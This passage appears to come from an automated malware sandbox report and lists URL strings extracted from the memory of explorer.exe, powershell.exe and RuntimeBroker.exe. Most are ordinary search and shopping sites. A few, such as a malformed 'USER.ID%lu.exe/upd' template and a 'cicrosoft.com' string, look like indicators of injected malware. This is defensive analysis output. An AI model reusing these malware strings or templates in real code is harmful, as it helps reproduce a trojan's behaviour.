            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: powershell.exe, 00000015.00000003.348574162.0000026779730000.00000004.00000001.sdmpString found in binary or memory: http://cicrosoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.375333738.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000015.00000002.381486406.0000026700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmp, explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
